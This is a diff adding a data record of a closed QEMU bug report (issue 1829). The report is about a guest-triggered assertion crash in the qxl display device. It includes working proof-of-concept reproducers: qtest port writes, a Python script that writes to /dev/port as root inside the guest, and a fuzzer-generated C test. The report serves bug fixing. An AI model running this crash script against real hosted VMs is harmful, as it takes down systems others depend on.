1 files changed, 96 insertions, 0 deletions

diff --git a/gitlab/issues/target_missing/host_missing/accel_missing/1829.toml b/gitlab/issues/target_missing/host_missing/accel_missing/1829.toml
new file mode 100644
index 00000000..1eed4f52
--- /dev/null
+++ b/gitlab/issues/target_missing/host_missing/accel_missing/1829.toml
@@ -0,0 +1,96 @@
+id = 1829
+title = "DoS via assert failure by guest user"
+state = "closed"
+created_at = "2023-08-14T09:12:19.865Z"
+closed_at = "2023-08-17T11:35:34.590Z"
+labels = ["Closed::Duplicate", "spice"]
+url = "https://gitlab.com/qemu-project/qemu/-/issues/1829"
+host-os = "Ubuntu"
+host-arch = "x86_64"
+qemu-version = "8.0.92 (v8.1.0-rc2-80-g 0450cf0897\\-dirty), commit 0450cf08976f9036feaded438031b4cba94f6452"
+guest-os = "Debian"
+guest-arch = "x86_64"
+description = """As root in guest VM user can execute special script, which crashes the whole VM with error
+
+```plaintext
+hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
+```"""
+reproduce = """1. This bug can be reproduced with:
+
+   ```bash
+   cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
+   outl 0xcf8 0x8000101c
+   outl 0xcfc 0xc000
+   outl 0xcf8 0x80001001
+   outl 0xcfc 0x01000000
+   outl 0xc006 0x00
+   EOF
+   ```
+2. Also, we can execute this python3 script inside guest VM as root (to invoke VM use command: **_qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults_**):
+
+   ```python
+   import os
+   f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\\x80\\x00\\x10\\x1c')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\\xc0\\x00')
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\\x80\\x00\\x10\\x01')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\\x01\\x00\\x00\\x00')
+   l = os.lseek(f, 0xc006, 0)
+   os.write(f, b'\\x00')
+   ```
+
+   This script causes VM to crash.
+
+   [PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)"""
+additional = """This issue was found by fuzzing. Here is an auto-generated C source code for a test case that will reproduce the bug.
+
+```plaintext
+/*
+ * Autogenerated Fuzzer Test Case
+ *
+ * Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
+ *
+ * This work is licensed under the terms of the GNU GPL, version 2 or later.
+ * See the COPYING file in the top-level directory.
+ */
+
+#include "qemu/osdep.h"
+
+#include "libqtest.h"
+
+/*
+ * cat << EOF | qemu-system-x86_64 -vga qxl -hda \\
+ * ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
+ * outl 0xcf8 0x8000101c
+ * outl 0xcfc 0xc000
+ * outl 0xcf8 0x80001001
+ * outl 0xcfc 0x01000000
+ * outl 0xc006 0x00
+ * EOF
+*/
+static void test_qxl_set_mode(void)
+{
+QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");
+qtest_outl(s, 0xcf8, 0x8000101c);
+qtest_outl(s, 0xcfc, 0xc000);
+qtest_outl(s, 0xcf8, 0x80001001);
+qtest_outl(s, 0xcfc, 0x01000000);
+qtest_outl(s, 0xc006, 0x00);
+qtest_quit(s);
+}int main(int argc, char **argv)
+{
+    const char *arch = qtest_get_arch();
+
+    g_test_init(&argc, &argv, NULL);
+
+   if (strcmp(arch, "x86_64") == 0) {
+        qtest_add_func("fuzz/test_qxl_set_mode",test_qxl_set_mode);
+   }
+
+   return g_test_run();
+}
+```"""